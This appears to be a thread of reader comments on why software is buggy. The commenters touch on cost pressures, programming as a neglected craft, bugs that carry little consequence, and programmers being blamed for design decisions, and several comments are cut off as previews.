  • Properly specifying and verifying all the code is orders of magnitude more work than just slapping something together and it's also proportionally more expensive. You have limited amount of time and money and with that a system must get up and running, some bugs are acceptable. So that's exactly what you get. An online questionnaire is not a lunar lander touchdown program, if it works at all that's already good enough, and it's probably a sidenote within a larger set of project requirements anyway.
  • In my (long and undistinguished) careen as a programmer / software developer / software engineer, I've come to the conclusion that programming is a craft skill. However, the industry doesn't encourage you to develop and refine your skill.

    To some extent this is down to management expectation. Annual objectives (for instance) favour broadening one's skill-set (i.e. learn something new) rather than deepening one's skill-set (by getting better at what one a;ready knows). The reason is that the former is more
  • Simple: (Almost) every mistake a programmer makes is visible somewhere, but there's actually very little consequence to it. Put another way, bugs happen all the time, people notice but it doesn't matter.

    Off by one, program crashes...user restarts it. Miss a "delete" somewhere, program runs out of memory (eventually), user restarts it. Some tiny bug corrupts user data, company fixes it, issues apology, life goes on. With a few (notable) exceptions, when a programmer makes a mistake, life goes on. Very f

  • While the topic itself is somewhat interesting, the examples are about design decisions, not programming ones. Sure, the second example is a result of the some limitation on the programming side, but it's still a design decision. If both examples show user messages that something is disallowed, and didn't just cause a problem, then the programmer did his or her job well, as they were asked.

    So the real question is, why do programmers get blamed for design decisions? In most cases the programmers aren't the o

  • Let he who thinks he can do better, do better.

For God's sake, stop researching for a while and begin to think!

Working...